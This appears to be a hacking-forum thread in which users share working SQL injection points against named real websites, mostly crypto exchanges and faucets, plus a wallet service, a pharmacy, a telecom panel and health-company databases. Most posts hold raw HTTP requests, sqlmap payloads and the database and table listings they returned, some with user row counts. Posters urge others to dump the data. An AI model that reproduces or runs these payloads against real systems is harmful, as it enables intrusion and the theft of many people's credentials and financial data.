
Interesting SQL inj & XSS finds

Please note that this user is banned
The exchange is registered in Hong Kong; judging by reviews it seems to be operating.

POST /launchpad-landing-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://tradedo.io/
Cookie: PHPSESSID=tq4847g6k9iiqu4d7s8e55bv32
Content-Length: 67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: tradedo.io
Connection: Keep-alive

searchTxt=1&type=all

Parameter: searchTxt (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: searchTxt=-9631' OR 5325=5325-- Etnr&type=all

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchTxt=1' AND (SELECT 8777 FROM (SELECT(SLEEP(5)))vjlA)-- efcl&type=all

Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: searchTxt=1' UNION ALL SELECT NULL,CONCAT(0x7176717671,0x4e5145647a7549476864704267677376734866527975776c5357784c7362694d6d6e426676565751,0x71766b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&type=all

available databases [2]:
[*] information_schema
[*] tradedo_live_exchange_2022

Database: tradedo_live_exchange_2022
[101 tables]
+----------------------------------+
| account_types |
| admin_controls |
| admin_controls_methods |
| admin_cron |
| admin_groups |
| admin_groups_pages |
| admin_groups_tabs |
| admin_ieo_listings |
| admin_image_sizes |
| admin_order |
| admin_pages |
| admin_sessions |
| admin_tabs |
| admin_transactions |
| admin_users |
| admin_wallet_bitcoin_transaction |
| api_keys |
| app_configuration |
| bank_accounts |
| bitcoin_addresses |
| bitcoin_addresses_log |
| bitcoind_log |
| block_tracker |
| bluktokensender |
| bnbaddresses |
| bnbtoken |
| bnbtransactions |
| bnbtransactions_log |
| buysell_blockchain_process |
| change_settings |
| chat |
| content |
| content_files |
| conversions |
| currencies |
| current_stats |
| daily_reports |
| deposits |
| emails |
| ethaddresses |
| ethereum_log |
| ethereum_txn |
| ethtoken |
| ethtransactions |
| ethtransactions_log |
| exchange |
| exchange_pairs |
| exchange_receive |
| fee_schedule |
| fees |
| historical_data |
| history |
| history_actions |
| ieo_purchased_history |
| ip_access_log |
| iso_countries |
| iso_countries_new |
| lang |
| lp_exchange_maket |
| lp_exchanges |
| market_data_cron |
| market_price_cron |
| mobile_app_banner |
| mobile_banner |
| monthly_reports |
| news |
| order_types |
| orders |
| passive_wallet |
| pcust_basecurrency_log |
| pcust_log |
| pcust_txn |
| permissions |
| receivelogs |
| request_descriptions |
| request_status |
| request_types |
| requests |
| sessions |
| settings |
| settings_files |
| site_users |
| site_users_access |
| site_users_balances |
| site_users_balances_trans |
| site_users_catch |
| site_users_ekyc |
| status |
| status_escrows |
| subject |
| swap |
| swap_pairs |
| test |
| trade_pairs |
| transaction_types |
| transactions |
| trazor_wallets |
| user_to_admin_logs |
| wallets |
| wallets_encrypt |
| zcron_log |
+----------------------------------+


There is also an old domain; whoever needs it will find it, there should be a decent number of users there. The passwords are bcrypt, I think, I don't remember anymore.
 
Please note that this user is banned

POST /function.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://faucetbox.io/
Cookie: PHPSESSID=q8532u351bo54t7aqvf5ump6ci
Content-Length: 412
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: faucetbox.io
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="login_username"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="login_password"

g00dPa$$w0rD
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="acao"

log
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="acao"

log
------------YWJkMTQzNDcw--

available databases [2]:
[*] faucet_cassino
[*] information_schema


Database: faucet_cassino
[38 tables]
+--------------------+
| airdrop |
| banca |
| bandido |
| blacklist |
| bonus_lotery |
| boost |
| boost_faucet |
| boost_usuario |
| carteira |
| chat |
| faucet |
| faucet_hash |
| faucet_pagamento |
| faucet_pool |
| faucet_tempo |
| faucet_usuario |
| game_dice |
| game_lotery |
| grupo |
| historico_login |
| kwai |
| lotery |
| md5 |
| moeda |
| pix_usuario |
| poderes_usuario |
| pool |
| pool_premio |
| pool_usuario |
| requisicao_usuario |
| result_lotery |
| roleta_diaria |
| saldo_usuario |
| seguro |
| sorteio |
| tik |
| tokens_pool |
| usuario |
+--------------------+
 
Please note that this user is banned



https://beamstart.com/API/v8.0/index.php?ip=1&system=common&type=ipcountry put it into sqlmap and everything goes fine)



Parameter: ip (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ip=1') AND 8507=8507-- JsUv&system=common&type=ipcountry

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: ip=1');SELECT SLEEP(5)#&system=common&type=ipcountry

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ip=1') AND (SELECT 4442 FROM (SELECT(SLEEP(5)))GQqQ)-- CYXJ&system=common&type=ipcountry

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ip=-2774') UNION ALL SELECT CONCAT(0x717a627871,0x6b507a4b5947614156574b564d6d4859774971656e4b64704c5155724253536167414f55556c7448,0x71767a6271)-- -&system=common&type=ipcountry
---
[22:50:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[22:51:02] [INFO] fetching database names
[22:51:06] [INFO] starting 9 threads
[22:51:07] [INFO] retrieved: 'performance_schema'
[22:51:08] [INFO] retrieved: 'innodb'
[22:51:08] [INFO] retrieved: 'beam'
[22:51:08] [INFO] retrieved: 'tmp'
[22:51:08] [INFO] retrieved: 'megplay'
[22:51:08] [INFO] retrieved: 'sendy'
[22:51:08] [INFO] retrieved: 'sys'
[22:51:08] [INFO] retrieved: 'information_schema'
[22:51:08] [INFO] retrieved: 'mysql'
available databases [9]:
[*] beam
[*] information_schema
[*] innodb
[*] megplay
[*] mysql
[*] performance_schema
[*] sendy
[*] sys
[*] tmp


The first DB has 71k users; the subject matter is interesting, money-related, and there is plenty of info. It dumps quickly, and the passwords are average hash-wise. All the material is untouched, I did not dump it. Kill it!
 



There are another 272k rows of users in sendy :) a very fat target
 
Please note that this user is banned


Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL error-based - Parameter replace
Payload: http://arbi-coin.com:80/main/m_boar...(118)||CHR(112)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113)) AS NUMERIC))&page=3
---
[12:23:23] [INFO] the back-end DBMS is PostgreSQL
web application technology: Nginx, PHP, PHP 7.0.33
back-end DBMS: PostgreSQL
[12:23:23] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[12:23:23] [INFO] fetching database (schema) names
[12:23:23] [INFO] starting 10 threads
available databases [5]:
[*] arbigold
[*] arbischema
[*] cron
[*] information_schema
[*] pg_catalog
 
cryptobirge.com

Parameter: forgot_email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: forgot_email=1' AND (SELECT 6158 FROM (SELECT(SLEEP(5)))EdEL) AND 'xTwv'='xTwv&user_id=1
---
back-end DBMS: MySQL >= 5.0.12

available databases [6]:
[*] exchange
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Database: exchange
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| t_users_logs | 129395 |
| t_messages_chat | 72774 |
| t_withdraw | 7030 |
| t_support | 5766 |
| t_users | 4492 |
| t_users_balance | 4397 |
| t_payments | 4285 |
| t_deposit_addreses | 3652 |
| t_options_bet | 1195 |
| t_tg_hook | 931 |
| t_fake_users | 566 |
| t_staking | 199 |
| t_spammer_wallet | 182 |
| t_verify | 95 |
| t_fake_msg | 60 |
| t_chat | 53 |
| t_spammer_min_dep | 51 |
| t_promocode | 39 |
| t_trans | 35 |
| t_spammer_domains | 28 |
| t_site_course | 23 |
| t_alert_message | 19 |
| t_spammer_msg_temp | 18 |
| t_config | 1 |
| t_course | 1 |
| t_messages_settings | 1 |
| t_terms | 1 |
+---------------------+---------+


POST /FORGOT-PASSWORD-ONE HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://cryptobirge.com/
Cookie: PHPSESSID=5jdnolk0o2l8633dj5fic974qv
Content-Length: 71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: cryptobirge.com
Connection: Keep-alive

forgot_email=1&user_id=1
 
Please note that this user is banned

POST /requests/send_rlink.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://vwallet.ng/
Cookie: PHPSESSID=2128uj48571dhjtmhmt7jroslr
Content-Length: 50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: vwallet.ng
Connection: Keep-alive

&em=1

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: em (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: &em=1' OR NOT 6804=6804-- WcYz

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: &em=1' AND GTID_SUBSET(CONCAT(0x716b767671,(SELECT (ELT(7135=7135,1))),0x71627a7a71),7135)-- baxT

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: &em=1';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: &em=1' AND (SELECT 3835 FROM (SELECT(SLEEP(5)))VTqI)-- epvr
---
[01:06:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Nginx, PHP 7.3.27, Plesk
back-end DBMS: MySQL >= 5.6
[01:06:56] [INFO] fetching database names
[01:06:56] [INFO] starting 2 threads
[01:06:56] [INFO] resumed: 'information_schema'
[01:06:56] [INFO] resumed: 'vwallet_2022'
available databases [2]:
[*] information_schema
[*] vwallet_2022

[01:06:56] [INFO] fetching tables for database: 'vwallet_2022'
[01:06:57] [INFO] starting 10 threads
[01:06:58] [INFO] retrieved: 'payment_types'
[01:06:59] [INFO] retrieved: 'funds_tbl'
[01:06:59] [INFO] retrieved: 'rrr_tbl'
[01:06:59] [INFO] retrieved: 'settings'
[01:06:59] [INFO] retrieved: 'acct_setup'
[01:06:59] [INFO] retrieved: 'split_tbl'
[01:06:59] [INFO] retrieved: 'param_tbl'
[01:06:59] [INFO] retrieved: 'merchants_tbl'
[01:06:59] [INFO] retrieved: 'roles'
[01:06:59] [INFO] retrieved: 'logs_tbl'
[01:06:59] [INFO] retrieved: 'trans_category'
[01:07:00] [INFO] retrieved: 'transactions_tbl'
[01:07:00] [INFO] retrieved: 'users_tbl'
Database: vwallet_2022
[13 tables]
+------------------+
| acct_setup |
| funds_tbl |
| logs_tbl |
| merchants_tbl |
| param_tbl |
| payment_types |
| roles |
| rrr_tbl |
| settings |
| split_tbl |
| trans_category |
| transactions_tbl |
| users_tbl |
+------------------+
 
paidtap.com


Parameter: reset_pass (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: reset_pass=0' AND (SELECT 8130 FROM (SELECT(SLEEP(5)))IdlK) AND 'BzHG'='BzHG
---

available databases [2]:
[*] dbgpgz6yhqmpow
[*] information_schema

Database: dbgpgz6yhqmpow
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| test | 400734 |
| faucet_claims | 271917 |
| system_income | 254324 |
| completed_offers | 254302 |
| faucet_initiation | 227082 |
| ip_checks | 136755 |
| highlow_history | 104068 |
| user_logins | 98840 |
| ips_historys | 60170 |
| mining_pay_history | 42444 |
| shortlinks_done | 29379 |
| users | 27186 |
| users_sessions | 25996 |
| notifications | 25585 |
| CT_game_claim | 18578 |
| withdrawals | 16215 |
| ref_commissions | 14244 |
| purchased_referrals | 8467 |
| users_offers | 5534 |
| CT_game_hash | 4346 |
| bitcoin_investments | 3961 |
| ptc_done | 2722 |
| mining_claim_history | 2179 |
| deposits | 1572 |
| daily_income | 1490 |
| coins_value | 1443 |
| bitcoin_price | 1433 |
| tickets_messages | 1108 |
| bots_ref | 1063 |
| gems_history | 1058 |
| block_reasons | 865 |
| history_daily_production_bots_ref | 853 |
| mining_history_cron | 831 |
| user_transactions | 829 |
| reg_reset_pass | 752 |
| jobs_done | 527 |
| tickets_support | 466 |
| mining_buy_history | 334 |
| prueba | 261 |
| clone_wallets | 244 |
| list_countries | 215 |
| airtm_transactions | 190 |
| users_deleted | 170 |
| site_config | 158 |
| faucet_history | 147 |
| perfectmoney_transactions | 147 |
| activity_rewards_claims | 141 |
| lottery_tickets | 120 |
| ptc_websites | 106 |
| mining_machine | 104 |
| purchase_pre_ref_history | 101 |
| history_buy_bot_ref | 85 |
| CT_config | 82 |
| notes_reasons | 69 |
| ban_reasons | 65 |
| whitelist | 64 |
| admin_warnings_notifications | 42 |
| offerwall_config | 40 |
| ad_codes | 36 |
| shortlinks_config | 29 |
| approved_email_domains | 23 |
| referral_contest | 22 |
| shortlinks_contest | 22 |
| tasks_contest | 22 |
| lottery | 21 |
| banners | 20 |
| user_max_witdraw_allow | 20 |
| ptc_sessions | 19 |
| offers_reqs | 17 |
| activity_rewards | 11 |
| individual_notify | 11 |
| levels | 9 |
| ad_packs | 8 |
| faq | 7 |
| ptc_packs | 7 |
| faq_mining | 6 |
| faucet | 6 |
| levels_admin | 6 |
| global_notify | 4 |
| jobs | 4 |
| memberships | 4 |
| tickets_category | 3 |
| CT_modules | 2 |
| announcement | 1 |
| config_buy_ref_bot | 1 |
| plantillas | 1 |
+-----------------------------------+---------+

POST /market.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://paidtap.com/
Cookie: PHPSESSID=eebda17542aafa42560cd6d8908ca50e; _data_cpc=4-1-1665312704
Content-Length: 133
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: paidtap.com
Connection: Keep-alive

reset_pass=0
 
bitspadex.com

Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=LOGIN&email=0' AND (SELECT 8550 FROM (SELECT(SLEEP(5)))IBGi) AND 'RVIm'='RVIm&password=u]H[ww6KrA9F.x-F
---

available databases [6]:
[*] trading_konri
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Database: trading_konri
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| t_users_logs | 515515 |
| t_support | 57185 |
| t_transactions_history | 23385 |
| t_auth_logs | 16876 |
| t_users_balance | 4807 |
| t_users | 4291 |
| t_exchange_history | 4038 |
| t_transfer_history | 3181 |
| t_trading_orders | 1377 |
| t_autodep_logs | 685 |
| t_users_staking | 261 |
| t_users_ref | 203 |
| t_alert_message | 183 |
| t_trading_graphic | 168 |
| t_spammer_msg_temp | 100 |
| t_spammer_config | 96 |
| t_spammer_promocode | 88 |
| t_spammer_domains | 69 |
| t_spammer_courses | 48 |
| t_dep_currency | 23 |
| t_site_currency | 21 |
| t_site_staking | 19 |
| t_trading_courses | 19 |
| t_users_ref_payout | 13 |
| t_currency_price | 1 |
| t_site_config | 1 |
+------------------------+---------+

POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://bitspadex.com/
Cookie: PHPSESSID=cfcvj9k4sera37ithkue4ahp79
Content-Length: 91
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: bitspadex.com
Connection: Keep-alive

action=LOGIN&email=0&password=u]H[ww6KrA9F.x-F
 
Code:
POST /ajax/read-product.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.dzenpharmacy.com/cart.php
Cookie: PHPSESSID=0e6967691079860252c6acab0b06a4a6; googtrans=/en/af; googtrans=/en/af
Content-Length: 68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: www.dzenpharmacy.com
Connection: Keep-alive

skeywords=the%25'%20AND%203*3*9<(2*4)%20AND%20'000I0nZ'!='000I0nZ%25
 
POST /auth/login HTTP/1.1
Host: panel.telekom.pl
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: https://panel.telekom.pl/auth
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Cookie: PHPSESSID=2h6m2ulk1dfh0cigur9d6i93g0

username=zWayxGeB'&password=p7G%21i2v%21X4&btn_save=Zaloguj
 
Code:
GET /catalog.php?podcategory=64%20OR%2017-7%3d10 HTTP/1.1
Host: ggresel.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: https://ggresel.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
If posting targets with Russian roots isn't allowed, don't ban me, I'll fix it.
 
Please note that this user is banned
Well, guys, shall we steal CS:GO Prime XD
 
Please note that this user is banned
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=naAL' AND (SELECT 5786 FROM (SELECT(SLEEP(5)))kLtL) AND 'FGjB'='FGjB&password=&submit.x=1&submit.y=1


available databases [18]:
[*] bcg
[*] bcg_archive_database
[*] bcg_automation_process_log
[*] bcg_central_regions
[*] bcg_data_imports
[*] bcg_ec_jobs
[*] bcg_employer_activities_log
[*] bcg_resumeparser
[*] bcg_sitesearch
[*] exim
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] phpmytop
[*] sc_manual_jobs
[*] sys
[*] url_checker

Parameter: listid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: listid=340' AND 5148=5148 AND 'jbAq'='jbAq&returl=1

available databases [4]:
[*] information_schema
[*] judged
[*] judged_temp
[*] test

Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=AXsJ' RLIKE (SELECT (CASE WHEN (7163=7163) THEN 0x4158734a ELSE 0x28 END))-- HEFZ&password=&Sign-In=Sign-In

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: username=AXsJ' AND GTID_SUBSET(CONCAT(0x71706a6b71,(SELECT (ELT(1481=1481,1))),0x7171787171),1481)-- oxAP&password=&Sign-In=Sign-In


available databases [2]:
[*] dashapp
[*] information_schema
 
Please note that this user is banned
Cheapskates)

POST /retrievePassword HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://bitbotster.com/
Cookie: BBSlanguage=zh; BBSsession=s%3AaJIG1iAsq2J51bMNiJ_O5F4leUESG_ro.DXRwvQp7hO4g6VwVTfh27f45bQE3dWysRH8QfIuwKO0; __cf_bm=GQqf9jM8ZqJDKvTJbVoMkKdIldNhQ.ir0PiE15D1yCo-1669228143-0-AXUaDYuYe7rlkaVHdQIzf46ThgsBDEIwt8YbGcusqYX4kxKM9eWjl5uysDL/uAkwXsgvhqTOJJ7uDl+/OmrXLe6MDUv1TDThKyMDKfL9w2CTuupCeCP6vK1y6jUZwvP4HZL0vC0VwNhyO5GbxcHcGUE=; cf_use_ob=0; BBScookieInfo=1
Content-Length: 71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: bitbotster.com
Connection: Keep-alive

email=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&from=2&submit=SEND


Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=1' AND (SELECT 2881 FROM (SELECT(SLEEP(5)))fAgy) AND 'oEyp' LIKE 'oEyp&from=2&submit=SEND

Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: email=1' AND 4168=(SELECT (CASE WHEN (4168=4168) THEN 4168 ELSE (SELECT 8616 UNION SELECT 8413) END))-- REiX&from=2&submit=SEND


[*] acc_main
[*] information_schema

Database: acc_main
[4 tables]
+------------------------+
| bbs_accessibles |
| bbs_fintx_coinpayments |
| bbs_fintx_paypal |
| bbs_users |
+------------------------+

Database: acc_main
Table: bbs_users
[36 columns]
+--------------+--------------------------------------------------+
| Column | Type |
+--------------+--------------------------------------------------+
| created | timestamp(3) |
| laLogin | timestamp(3) |
| lan | varchar(2) |
| paid | timestamp(3) |
| plan | enum('trial','beginner','botmaster','protrader') |
| pvLogin | timestamp(3) |
| revAval | int |
| revGlobal | int |
| revTotl | int |
| revUsed | int |
| stratMgr_lev | int unsigned |
| stratMgr_sym | varchar(16) |
| stratMgr_tf | int unsigned |
| stratsMY | json |
| stratsREV | json |
| theme | varchar(2) |
| totlLogins | int unsigned |
| twofa | enum('email','device') |
| twofaKey | varchar(32) |
| txAval | int |
| txGlobal | int |
| txTotl | int |
| txUsed | int |
| uem | varchar(128) |
| uid | char(36) |
| uips | json |
| ulvl | enum('user','vip','finance','admin','marketing') |
| unm | varchar(32) |
| upw | varchar(255) |
| upwReset | varchar(128) |
| usr | int unsigned |
| utz | decimal(4,1) |
| volAval | decimal(24,2) |
| volGlobal | decimal(32,2) |
| volTotl | decimal(24,2) |
| volUsed | decimal(24,2) |
+--------------+--------------------------------------------------+

Sometimes Cloudflare sits in front, but they are clumsy and it works all the same.

I notified the admin; he doesn't give a damn about his clients, so do whatever you want )
 
Please note that this user is banned
Some labs and health companies, not for me...


Parameter: sponsorid (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Pkg=99&NXR=Y&sponsorid=';WAITFOR DELAY '0:0:5'--&productid=IXQ4CE
---
[09:43:03] [INFO] testing Microsoft SQL Server
[09:43:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:43:38] [INFO] confirming Microsoft SQL Serverr DBMS delay responses (option '--time-sec')? [Y/n]
[09:43:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2019 or 10 or 2016
web application technology: Microsoft IIS 10.0, ASP.NET
back-end DBMS: Microsoft SQL Server 2017

available databases [63]:
[*] PerfectHealthLife
[*] AmericanDream
[*] ATG
[*] Atteva
[*] Calerie
[*] CalorNFT
[*] CareBeyond
[*] CareBeyond_TEST
[*] CCG
[*] CelVitali
[*] DreamTree
[*] Entrenet
[*] EpicTrading
[*] ET
[*] EXSTC
[*] FitnessAge
[*] FullSend
[*] FutureX
[*] GBX
[*] GiftsUnderSea
[*] GPA
[*] GreenOrganics
[*] GSI
[*] HelixLife
[*] HempPower
[*] Hulsa
[*] Infinite
[*] KinlocksTax
[*] LeafyWell
[*] LGRX
[*] ListenChannel
[*] LOVEco
[*] LSPHealthyLiving
[*] M3
[*] master
[*] Millennium
[*] model
[*] msdb
[*] MyGoCards
[*] MyTruGlobal
[*] NanoWorx
[*] NaturesFrequencies
[*] NuLife
[*] Nutronix
[*] PYUR
[*] Quicksilver
[*] Reach
[*] SYM
[*] tempdb
[*] TGD
[*] TheBettorsEdge
[*] TierraScience
[*] UNEEK
[*] USACV
[*] UTS
[*] UWC
[*] VGWellness
[*] VirusesX
[*] WealthStackers
[*] Wildtree
[*] XHL
[*] XtremeGreen
[*] ࠁerzei
 
bitxola.com

Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: &action=LOGIN&email=0' AND (SELECT 1800 FROM (SELECT(SLEEP(1)))IkEH) AND 'crzT'='crzT&password=login_password
---

available databases [7]:
[*] information_schema
[*] performance_schema
[*] phpmyadmin
[*] sys
[*] trading

Database: trading
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| t_auth_logs | 59003 |
| t_transactions_history | 23782 |
| t_support | 23522 |
| t_users | 12593 |
| t_trading_orders | 11506 |
| t_users_ref | 6690 |
| t_users_ref_payout | 6690 |
| t_users_balance | 4102 |
| t_invest | 3505 |
| t_autodep_logs | 3196 |
| t_deposit_addreses | 2143 |
| t_verify | 1924 |
| t_transfer_history | 849 |
| t_user_api | 661 |
| t_messages_chat | 483 |
| t_alert_message | 306 |
| t_spammer_promocode | 292 |
| t_users_staking | 253 |
| t_spammer_config | 175 |
| t_spammer_domains | 53 |
| t_dep_currency | 42 |
| t_trading_balance | 38 |
| t_trading_courses | 36 |
| t_spammer_wallet | 22 |
| t_site_currency | 21 |
| t_site_staking | 17 |
| t_site_nft | 4 |
| t_site_o_currency | 3 |
| t_trading_stable_up | 3 |
| t_messages_settings | 2 |
| t_currency_price | 1 |
| t_site_config | 1 |
+------------------------+---------+

POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://bitxola.com/
Content-Length: 90
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive

&action=LOGIN&email=0&password=login_password
 

